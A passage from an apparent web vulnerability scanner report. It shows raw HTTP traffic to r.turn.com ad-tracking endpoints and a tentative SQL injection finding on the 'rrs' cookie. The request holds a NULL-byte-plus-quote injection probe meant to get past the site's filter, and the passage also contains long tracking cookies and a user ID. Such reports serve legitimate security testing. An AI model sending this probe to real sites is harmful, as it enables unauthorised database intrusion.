rds=15138%7C15138%7C15138%7C15141%7C15138%7C15138%7C15138%7C15110%7C15138%7C15138%7C15138%7C15138%7C15138%7C15138%7Cundefined%7C15138%7Cundefined%7Cundefined%7C15138%7C15138%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15138'; rv=1

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:22 GMT; Path=/
Set-Cookie: pf=qY2bpRTQ52h6k-rEhULDmf-80bcrj6GfFlLy65IAyItpZRM3I2Ow27XFAiLSy6gtZDpM35cC-2bkiEEmtUQheKDK9267-UTVtogj5UXND2su5HAnk5LdATuOawO3do3_q-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFd_4eUErznbemNQIZk1eVLKW_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUz5hB7k5XBK9McX2onxeGI5KQZVgadKvMCYCFgUrjYUKon9unhJA2-TEU2L0iqEMDVzgULCKniFrCm6MPtzExb3UlAuWh7vW5Q399kY2EvENFzGbodWQIM7eNZ6tjUQklyRTBGfXWYNvyUuhYNY6yLvEDmyQ40yuypcaj2n-9Cz63xi0zGTncnVf4kQZI0iTHB9aeSc0FuFejP7DT3fDq49_6nkAMnCskXAXCIeamqlhES2SuE6OtDGQ2imUpo49am5O8A7FIHibGj5DpgyEHdXQAR7gRvAUyzscY9lHU85mboMj7fIiLPeSUyPU1aySWaYnDFpdhfwUWntACIjyeHBjXBZnzwqmzEd4_ZfNeMUr936QamkX1LVGAV23gbEEv77QebunEAT3AyT-dC6RmTIEpBJDWUKdMYOQQtkXnJoPmGi_btX5p3IeoZ1Lxi-nN9T1I9sIGJPnzQjLyKti_2IsG6rAfmuloihjJUlNjU6wdmGgpL5a6D3XQDJY66KeNuv_TPnN_r33AUytaYxxyXHMpoBoI0SYunrxmqrb4tZx4OkdofIjRakYPCGAjMC1uxfZeycu38tuqRIWciZAR9hcyBeVzRUxv3Q7asCZPWvJx5xGZTqtRs2xUNiSflAsSFsW-QtNzsQrdzdwrcoC3tkhYHR5iu3qsnQShCayeMKXbjJNP-yTHg_EwL_p_kla7AMGYTu9kshn0fu08LSKK9Z543WaC5VrfyqqYlrPi5RsQ6MURwZQt7ZlSH1-XC3FPlwa3wVdtHBfWU9tEQhfkj8PbIMSCp0s9p46owHemHBI44M2UTaVgavrLT_knofC3_fcumHzxez4oVfLlbiK9GX-8RGzOEjKwUNFtEEw3cam9BccEarIpQ9BOHGk5MXWYGe9U8yjrMqBCSM4uyBB8RMrmjUJuzDQa3yK0ArQAWD8FK1zuDX0vUxNNi_sefehTjs-Ek8P6ZwSKypvXeo6--G3_4NUWt5VPfPBVvmwky8iGB6Mei-Co5Pi6PU2dzB8gnRv5FDc3CttxSlPaoxd9ZJg_GxCAnMbxDPMG3aVXSB74140ZvvKMWgrtC4SCWq8_23--Px6IOe43SPFoZMQY3he8jhSuSGxpVTMbu2Biq1cV7yAKOnUVIzNyIqmOosXytGMcorIx_eIHOw0mNEsEgJ9zvTW4UrXpnwZNR-dqAY9pAGZqVnwMgUsxj_J0U7rwX210jST5FOXamjm2E-eqDPrvqF7LxDYaWnK7yCzjJLEFsF_1gXQup4U2Z6iIaIceMbHzJdW4zaFWhi71EUOeSjfUSmohzpuSGtzPqET1ZwRqBA8faKAQ8ScuOhMxEgEEI-yCPEW6KDWJBVVqZ8RdE-GQirFt1fEONFpzomfU21XKlAFv742XXZIRhFNLL5BYaXb7zu1RSwq44rxRRvOysat_jFzzvTdA-ZjkNz7sBx5YjZBW0EhdEV_TwZIxDUW70r3e7pJ1-TR-F1sI6I_9ogEE1ieHXSHT8YJ9V9XuPMns4IUIyHL2xmfESdWxUsROq8UchygSq_Hdv08JgwEWi3lpcWok_cX2Cb50T3nJSujWmflunVVIvfDAAZ_ic1bpn2n6j0KAXr-F8h_otiKTDPHaFztEy4xEzRWZfSIjat-l3Iho5BzQjTd0nmGLD04qoX36F6GBGzTTi7rcg0HsUWz6PDbTG7ngrGqQRjkryS5N8GaeeZ5eoGkWq419T6v1raQyKtoRMygKwCKIQFsUa_kASFigZxBB3r_OQJyN2Rdm1GZDRZhWzy5r1zk7OEZzQhopVJMY2oZQ5dToHjubH_pZG3Lc5UHogasT9J2-8NhDSYfLvAdPkIwo8toVtcbEjAzTK86Gkcc8x5A2gv_y2YD3emUpAWd6wbsL2X3RCtIB-q7ZC5UbEPgbUDzwx9stVoQNj6Ijg2os19R4J_09QinFBdxdZ4uJ8Wx6iVLHvsxfIUeeirrXIriUvrBbeReuu1H5jiFRTCwXRtr987sbNkvliLbNUlo-UU5UJ69hMOu; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:22 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:22 GMT

Request 2

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:23 GMT; Path=/
Set-Cookie: pf=S-e6zHsuseIlMTG4jCTdV-0gCswZCfCygjdSABuWn0oStJHO4dSC7tcSjJ5dCIRNZDpM35cC-2bkiEEmtUQhePoeA2UJNSjq3A3ER1KjcuMdRoGs9UmTmTpFJBUogllMq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdDsxHjSmSqPZDhW_CwkUEmOStrfC9SER61onVprd_onMryjVa6LMEO3kCLjO0IvNryW-5O2fQU_LHsnkesyo4l1ninJgxH9woXm2rr-dAVJeAGRLyWCf_R9HjoKJrFBJztnA0SKf0AeMQvlUxM5fuDYkU_N-HaJfQ2mSe79hy0rTkr_88z-lIzqs0Ol8dwnu5yLplyjYEIvupA0I7pwi0-348FKCYaQBvgSAabtXi-fpQyjXOC_JcYZiQotF0kInhYRcKu0mjXc_6HE2rVAFPqhBQ0jlTps3Fwq04fir6wTUJzHKXlDlRanZxCZCQyk6lMqaWlf-UinNwmNpfMC4c6uyHHnEsvNIqYpDceKYGqv9q-il3AeJAASLwAs1050Tj1_RXLdZ4YH-Z0KqDvWEjztrWS1UhomoFl5YqlWui_0Su-_lPTnCNAusVM0T5cURItoniM0a5isrpqxa8OCIjS6TnUfXOQDidbAP_eMCMR4OsCXVtbSu3VCb-SPB8-48PyD4rNtf3E_Ik2mzgV2yfZqhKPj3cEaMIp7bjLFyeC5-rHm_-GZGmeTVrwxwTeL1cpOEH5V1jWK4p4IcVMVbRtyErkapfdU6UeQ-2uXgaTX8d3xYWjXuv6Xso_GWSCxJO-yAedT9lU-24b_pwCRN2bLn2T-PGXGUbdGpj_x88ee0BbV5isvxTPt9CL0PnheTtKYmO0_8Omb3stvz62bZIshLIPaZMc1uyxZOBshjQpjasJ5ZXxe9Txls8260OcYp080OKRhrwP1aHW6KOpeZltWYFO5rwOWd9jq-KL36nBMAPvv4Wi21X1t5b8cFUABM4rByRIjFDUoSjcaAEBXTOPdpkIYjQDuEnrAMpBz09-N5nXh9DYf8rgXYEKPvr41lO6Rc3UztnWE4E7H6lg6pFOwLXkbMMyjGQbpC32tSXF_fPgSAAdJPCg2aibKad83PI1bBYLXepGCThsYriZvRp6BcJPKi3DJg5b3K8RfkrUPmGMCv4_cgIM15CoZm21ra5tAYQXV-HFqGk4-9vGMX4cRsfLQTKeWcvH5tuPJ41gCKmaZ5sFflhNPeaGb8iD0vobCBbptTiMDtKXMfE8F6rGhmTGWml0U-dioAHL67SPRfNgqDPymBO5eTCVQhfuoFqgMOqEG5tC6qLpQerH4SLCiNKN8xM_krVMX-bkjkDchP7fMS2_kyQNzFt4FjPKGnWa4oXJQ3DINuCENZrLEjKBp0ouaBT6TNwtU_eRYGldhYXzWfsFkgKAvnpKkZW2CopYK6joUv4cw1D7GXwSXdhYVQAo9tcmGkyBhPFQWZMGdIUOi2nbuz7oIR_myJuMtAG-p0YFCnBlxJRhPvw0uEYnLtjT_EEFMBHXSBhl4iNIpF_LSDDh7u2cxVbe-eXQkkGbPpPYvrYzw24WkNGCP_7E3_IoEWmOXMgp48jsFQ9jktNPVtboxL4HZznybuXKwX6KijyEsYOCTHPsH7rLzoi-uiH6MYUVWruk5bWAW-_lwoZskScGE90lTfFi3d_YWZPAXOZP_Esyu1_9wbvw5FxCdftGz1WwsPYCRq_wfMQ76qEkVoidGlyiXGfkZv9SHpnDoD8ZYPyOBlRkLLbN_lonaZtqMBoxG7Uiy9Fzo3licLkSCZJAQKibDTSE7IeDWe_bzT7mFbp855eEbvgJVG4Tpa9pVpcQIt82dyTg2I_ITtU8n_B8rQwVdc_JV_kZ-Zuz__ZCxq1c-2K8_Wnr6YEZ0LwiNNWXaAt9HOlEx8uaQmL20D9vzsmqf97eArbBzMbH8JaP33lkbgn1rJkbwDNpvXf-Jzpubeo-ViW6ovbLSNpT46q3WB2ibjMkgV8PBn08xexXZE8uVcqFU6QLNZIAwfLw2RX0aXE4PmNxp2VymgVX783j9NCggbKJc4keKyRbHVkBN_qOvpXsILJUWiTWsbqnKFSqbYUfMSIMnqx_6lpxdbCej6wEF9mLzk21blC378EcMWb3oAv4eW_PqIHgGqmqCgr77Znx1i02Us0TT8g8IYaDgm525j3XPT4b08USzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25uBGXwNOIaLq6t39p22PaZg; Domain=.turn.com; Expires=Tue, 13-Dec-2011 12:18:23 GMT; Path=/
Location: http://ad.yieldmanager.com/pixel?id=1210787&t=2
Content-Length: 0
Date: Thu, 16 Jun 2011 12:18:23 GMT

1.13. http://r.turn.com/r/beacon [rrs cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The rrs cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rrs cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=undefined;ord=5328984577208.758?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QM70Whve3yMvxkhKlZSDFc8jBjr9GZaXPVHd3KPTbrVh-L3XcPmT4hHXOQgApIlYYCcoFPzHtthoKoScENuCacAfwlpOGZwMiTYKzkLyV6yLZO8TKZa-nLTQQ4a65pbCg5Ip47iYWcr2TLdwTDr0L4oBBpiyP3J8NU50OkfeFof5nfT0WqmMXNTAO47jNWqP9DMJbnJ4jgxRBVKYcWOOoBo1vu2lsqV8DN9Vps5BPlmPLL60Ne9Ei9t17XStRc4rGERgBg46FC_PZzOaKvw_-cZloB2cEevUSjzsvfqJ8qZhgZ9g0kmeR-0KBwkm_b3-nHDVWO4oEVu9LZTNJAoERvvIJejvF6b257maU3ML6OZFn0pS1M8s2KPrvUfPPF0_ewHYGlNdqDaG9FYWPprE_WjI_lsRoaOz7-O-vgmKJiTz-KIh4eZr0ecbMlDpVZu91zdW0hE-4eLwR7bomsP7JSdqWSoz4sC-t192PZJ_v5Q-P1VlQMzPKKE64Al6GE9_qQBVWHaPX-roIWbRumWL1-XpDwD22ZRNSBnUmAd0wjxC8t8bNFJSd1YiPEk8t_65cnD2Yeg02hxYDcV4Js2beeQ5R5-3xXfzzH2krAPRf428tdb3ea_CHM6GXs7htoYXSpzxUEP4Lawlcjwmuu0sgABXItk3mefJp5QRHv4O0nQLT7vqCmjKMUnpRJ6SJsSELsnefots81rrNB8RkZzwt9xgKqCmjZaalMlFzn1gedMiR83opqf2DdmsWkwVThPxhyYcbbPOXHwjOkupykmG8XHU2Z_bwsvqeY5PpknKks9Ka5pRG06H0tQ1iybpB3pDqsDA387b4GyTrdtR0OxRq1W2-clEv_ue7qpjwh19AlSzwxLx1pBhUX4CYwoSQucKtJqb949HbLP0at-l-Te-c7NLS367-cid5bH8-bJWmY8nC9B9w1ij88w7eqsM7UhZeuq4rrlofmxpvpW8sH43ef-7J7zFZpaqjQcGC_vq5exjB6sqt4Mo-GvkAj2qErRL9pWBI8bQOJli1okJuMhLcQljneDOkY9olIfd-ve5Qn4-P1VlQMzPKKE64Al6GE9_6W9aRH84b2cB20BvmgB1t-XpDwD22ZRNSBnUmAd0wjyOWY3k4-itBWJe_k62xWOCrFV4LhRdbHCAEu2Xc3dVj-Q5R5-3xXfzzH2krAPRf418WpxTiSnvzOJ-ZkQfvNQASpzxUEP4Lawlcjwmuu0sgAGs1MSewshLM0Q6GhK5Ns8fU1J7JmYpzzzNP9hB_wUy05oRsNhTbhcD1_xCDQojfMSuZLsISBijKSjMDSgLlyDjsNAVa5Ct7DxoA1avkLsQ815KVjL9JqXyOpgagVKRMbntt6vzlmgFJ9k1Zzq45WeFCQUiSJFaYOp4MQlbe-RFUEK9KsJrC9CLkGJUacP7jEa1wTMgEYoXiZA8_W3FI42qThwrh-6wCu7vlgqZNOXixmWgHZwR69RKPOy9-onypkTIcQzOQc65c9KVO3IQPv8Yd11jfaAGeomVXk2jyqz756mNhe7mBUb-nxi7SHg4OCY4fQNDPmLA1QCvKDvVxcR7AdgaU12oNob0VhY-msT9lb_ydeK6sfV-VwC1t6PXZrSU8zXCbuEO-Hn-xUU7T4MdZMXr1rBrtZHchRIeH_p0MQswiaZbyLrfvl0j4wXxTj4_VWVAzM8ooTrgCXoYT3_ukoy-I69c7SrUTlHbB6rZ5ekPAPbZlE1IGdSYB3TCPPtQxe5L3Tuc-yk0WOEmJZ9iOsnV5UjcUOjnXUSJzJan5DlHn7fFd_PMfaSsA9F_jfnYBNZ11ca-Wgmkknbh9eNKnPFQQ_gtrCVyPCa67SyA_xeh6xaAKc9mefeGrL2bordkSY3wrTx66nlJUXJL2YzTmhGw2FNuFwPX_EINCiN8l08PBB5hX0JN8MvjDOsPSeOw0BVrkK3sPGgDVq-QuxAsFTUl8EdeBakl_JEHsyGF2Jfo-RxTjyjBkOV794zNZ0kTA-aymPAds4qYFrApgUvcPT0oUz-YZYVaDcHqgl-9xmWgHZwR69RKPOy9-onypimfvYrBKXvtznWuT43S50y-3u16r0dKm_zz3ndHe3WlG-QgtH60dqlqdrI16uF-EVNzoshUKoWhiHnNcI8oP4V7AdgaU12oNob0VhY-msT9kNb2AdwFV5i2vxwzlIKJ3BfY904hG-_CHlEd9j-vzfzk5Jifrc9V1OOzEX32QifKI3TThUmivC2QQLLhMmAROj4_VWVAzM8ooTrgCXoYT3-ZdIfAS6iVxgYyOedo9Ki95ekPAPbZlE1IGdSYB3TCPEX3xTtUTn7ghX1OdIngM2q-RWnunI4BlM040X2RcB965DlHn7fFd_PMfaSsA9F_jUBCGuQvL_fhodmVMnOIMvBKnPFQQ_gtrCVyPCa67SyAw4hmx2eXEqzbsKwy_MNlFfUa0Y_5ftklciMdgbQhb_wbdYORBXyNJvBU7ewnBysYP_zg1-oPoaJCGGP6Vt55Gz_84NfqD6GiQhhj-lbeeRs__ODX6g-hokIYY_pW3nkbP_zg1-oPoaJCGGP6Vt55G1OKf083dm4Ocqz5E2RJpVu9TfQkOcNz7DOIIZP_23WvvU30JDnDc-wziCGT_9t1r71N9CQ5w3PsM4ghk__bda_nUnHYqNkC6RPs4-2B8pJoMqCuwkKr26TEWeaS686ExCPxJGFKBs6DSrH4oyWVjhIBdxGEbgsgCDz8r26d8pRZAXcRhG4LIAg8_K9unfKUWejxkXIMl02q9l3ycv51k_QH1ePXpCkOqUdD3FJ26E0LEgnOhSnZw4WOirtIvKWwJRIJzoUp2cOFjoq7SLylsCUSCc6FKdnDhY6Ku0i8pbAlEgnOhSnZw4WOirtIvKWwJTJGg5u5RuPReUxP5byb5LGsjsJdNDz0zBLNR8ReLDcirI7CXTQ89MwSzUfEXiw3Iv5E8JDY11x5xog0GskBswr-RPCQ2NdcecaINBrJAbMK_kTwkNjXXHnGiDQayQGzCjVgVkoy7DysIPcuC3AUG0sb1BDdWaxOURi_bqX1S5T5G9QQ3VmsTlEYv26l9UuU-W___E3ohWz6drp_rI2j18pjDJAj7Gbh3rF9uN2-5_zdRHqYmtLfdK6unD4Xv15XLH0evbFMdkuI2WqEUI01UYXDJU38vLMvNPfD69rioBNl6-78JM-YwVK9vMhQzP5aE-vu_CTPmMFSvbzIUMz-WhPr7vwkz5jBUr28yFDM_loT6-78JM-YwVK9vMhQzP5aE-UaEwuQGXrKf1B0pg93pQC8wfsfoRTDgpAqCg9KVA9UvMH7H6EUw4KQKgoPSlQPVLzB-x-hFMOCkCoKD0pUD1S8wfsfoRTDgpAqCg9KVA9U-Nxmcu6N80G4H7yE1a6GL_jcZnLujfNBuB-8hNWuhi8zo63SsMKXllQ8R3TROrVZwRV4qFgI_yJZybaj30x3rZThUGsgezmPZdo0hiRJAEU2UlTEERLOiMahUz0Je5vrQpUNsf8ubz28dE3HpFhXM4HLQRF00hhIXSJp9kwMyEKBy0ERdNIYSF0iafZMDMhCgctBEXTSGEhdImn2TAzIQou93XF3r4cgLiZIl0wssIM; fc=c8voyByxtfmxf-PR5HgfpjgORIc3Od-xFb-8M8t9VWkz6wrQqI-cCCIP4q7JSoro0YGlpSJHEwaZrD9xrQykZRLTM2UWqcEggsPn2JlFm6WKJ47y0SjHASrSoX2-_RWGR8GD8YL2uMyYOovbWSVtT_OjMRX_o6D3TvHXeB0H3IoJPxIPX2Q6BIRFliap-hOlRK2X8EADYMp4JB-33zSWnLP_4lD6MCBjT4SRxTIxlhNKLFBAG3Fk9H3_mDAMZFkDVnBVtdUIoJ-JIgllkJFaAJbHZLznezJA10wgg7oc-ufuxx6wPWxSLH-VTpbekwI2; pf=bskS8Lli70BjXEzd5NYfF8V9tHnIhHPKzn-ZptMbz3NTv4g2_4PHk6pD33NmTL25iyDxX-e5nvqK08ftGFlNZcB-blYU8Y2b3uGZySbN9k4boogWXDFyI4_-RvN_buohq-dHAl-abYU1X5bYp5n9Cdcc1kdI2OrvyH13NxBc5ZZblSYEdunA88QWsswFnK34IIbRFAp6kq4cSFltcxEru3wiHybxFoqFMdQqHxwvVjx7zBU2vT3hB9b5_A14u9LALQcduwwYmRsag5v8ztN6UjLmZCeHJ6h93qhIv-rUsPdbHJlod6TESSrv6Thxy6WamFlDf1zNmpUN4p-XWvhOtwyxeWnRI3qk58dH_r-y85DlfxWknFJRlb9hzn2M2frNMEh1GRb-PuEMe2Z7syUFVcpaPHcpz9cpkPkyFl8KnA3kFjox_1jCVFJu9ob0C05NyZFnUVV8zZwxZ0Jqede_6SEBTTPtCItPvtKKOGZm7eRvub6YMtD_axmOFpwTegZ0Ik_TZHzQHPkidsWQCuARecCEpqUhieOSE4eC6JSVC4Kb2gj1O0-Z-93OhvmeJIXktssbq-UJ0gwP_tjxgElGHyc6m9bbAQkPtkmDiMOswjx_rgnZHXFHutbbxwpp0mzc0f3MrVLB8Sbr0OplZ0YmpQ6pPLr5WGwJSCaSLyPeD8tW8QIeq5GdjjA2VLfSe86B_U2uPTCuMGNYOoaYgaTljvNEkx61aa1aewp4qtmGVPek9QMkyjNbxjUHQBR4E4B3AGUJgKTp8qs6Sh239g-tJFoqZVBpLhgL2E7flNbkDPo6oQ9T128OqIjRPGIgGqJ0U92zB6HrH6sGkt833E2I0kS2ttJsutMRJGOYaR-soWsrqivW0mVJFXQS3dhrTE8SaKKXBxFLQC_mPwxjkeL_DORS4P3pxhLoRgihOxnoSsDlCw2HnM4YLv0kpO_GVKupX5sc0C6btaAdqNlMlZs4oTCY_AT5rVNqw6Tz15xoxFpBYNWUpIQcuBazjzssqEIPZ5bfZwZFU6nN1pDVXOYaJ8DdOZYF55d1PpfBxPHyuH2RHojg75w7am5jitqGicFdbR_ukiIJxkBku1CxquV17mPFnSRDfouZL6wYhXooxR9ULrxpvguFI2ofDAIOd3EuO9yXy3nBEXqSScPA5E39O2_zg7l3tDIiyF94B5aERskWHv8BOnUkNaZrdPIQNGZqdwsP9I0MRtXw8xQWWbNPUyQsdjE_Scn2QYUNUmcT7rDH85LuW-sDtP4uwhJo9atGrEPrXDmdsIAOzEayx_QQ10pBlWBp0q8wJgIWBSuNhQqif26eEkDb5MRTYvSKoQwNXOBQsIqeIWsKbow-3MTFvdSUC5aHu9blDf32RjYS8Q0XMZuh1ZAgzt41nq2NRCSX590hwfiGo-qcVT2kvWmzeR7b1paN0zLvFemp5AQnABOzIFk-pYt5rgVKJ87aXtgPb-mafaJ5_5dz5FYF2gdO3-RhTnUyFltTQjNRcqU7m_5Dsdg2BVOoqsZOS_mkJdfuPEzm6ziEo1_QjXTUZsQGb3aBmo_VB_3afAvA7HmJ70VD1x9GqiaHujprGHOBA7aEDie69XnZ9g3UdQ8qboT72h45foF_fR8Dfspr5EIo6mININ0MwGURZOI6NOy-sr20mDmWfrauITMqFQqh085LSKQUL7YGM0pJp1-FIztq58QhVWy6LSDOwot2ckvPUzkd-FnxN8NhVB8sqANsWORR78w7iqAGDudyRR4sGrjr4yCu4BPZ9sxxEAJuqkU9WhgK5HyS-jWx86QRjwbOSlxW_AShejO2Api9OqW7wGthrtivajOoHMt7EKDIqFqYM0LalgBhHGk98NLPXedpy1UU1G0p61bv1d1Qe8RvD9O3tReDwxPBbZMzCCP1zNubGNg83l1aV51TfDhTgj1yUZOWuS-pj8W99_7k59ODgmGDUx1RLP4RQV5YsF7eRC_oBFtd7vTs-bMZZ3cr36hzZbdHwcgMjIQ67GgiGFnif7dZxa3qqTs_pw5jFRYMsjf2CDWROI6mFHsv9rileAh5u94Tal8X9jZGPmZVvtACyANcU61_2D_gjytCfJX5eIYzCUnD9N0uTPecPGlXnt0zeFF6nGhy-4kHkvuGu7mFLrHknQIOqyVa7C5Vcz2ztFo648TLIYncavW2EU0-FxAowg7Q_J3_JUWPrldWd5VL7X-3ELxQm3QGLlDe9QHA7dTmmKmFxV0767zf8vh0-XU0u6MJx4viNkNYwNHgm3A-Zsn_tb2nFJRjBcEMxdDM5u496FsXzZoCQNrRn4Nka-1SbHAlq1j0766BFlUYsZHI9nvDUSjNUKoFWTkAUa-o1j-LL1ebdsaBpOZQwog1WHvup_q5MU0eWf_8Tnz19zggAp1l0o0E-qtSYNUJ36V_bsysgOo8ovHlz0rw4urFgweCpjhoovSxZ6xAsLQbFPBlhboS688EaXiGds-5scOf0AWtR0WtyJH-06RSCV4rzVRndoxKQ6xvTNWKSQfuYds5-6wqXTrrprCUxSH31llwL8axfVJ0d6h2Ke1Lez9-eYMqCkG4uUOXcVRZwxg85KAU3HRwHZ-EWY6qIaKdc8DaRYJXxJzEtphWqdWwTUQc6r3kmRMNC1ofRqXiWAg7U15-Vq8fXUTyQ-Foh2RKGC89bCSZhuIo0DelrjnD_y1FdMAK6632Po5svz9Xs-GXO_PYmIh52EUXzRY-jfWrhp-btGaCKGToFYaTe9bd1jKXwduyoimxxjrfcWCeJq1txaaBU_3Uczg1vUpNInXslg4NWbOv3i1AMVsxWmxcjn77s3i60QHhTEr6gILrU4PmsHL3FqzwzpkTuJbzWi_g5eyZHwtMfpYoYwULodolIu7euVx1T6-kom1lfGeK534YvRLg1f6xfa7TbJat7GFUh5YcwiKTv6i2BObi71nwu2712ua_zaapTMdVqI2HeT5VUjRYlLwTM6Q4btGEdG0d_jWUX-DJJ6s4pWL_6FerjeM6JRh-LuLiaWTXIluKkF9otMRxuQA1xZO-l_PyGdq8ZIdQBo46D090aTaKlV1enoq-_ZVUdLnFjEj8JuvB_NmaEIhlkkUtL2E3UODDMR1tOQu8PjS8RbchSrxsTjxxMOUEsUJ_Z756RnNmhOA_TD07hZfxuz8bhfLCVULYz6Ok1J2_QA_kXIY92iqRVh1b6IbTDyOALqZNl5K11KDpAXL1nqDbSN94B3fAGfWH1075KVzt7-y7v8wzj5HvH-kwIHXGh1rq2Sy1u7pxUuundR497HrST_MMHxNG2Kdut19FcHWUqjUfID5JAiaS2fFEZWuWIqjpSvJM2ivPIAO7c_zUdwbkiWS8ejzieFqJCa8rSsS_dWSQq-Icz8Io9aHLgwbQxkFBxTOEAWmKRZWPfJkX_p8vFnb1Nu9kYvRadgXAM7qphVq6O0Tj; uid=4325897289836481830; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C10%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18%00'; 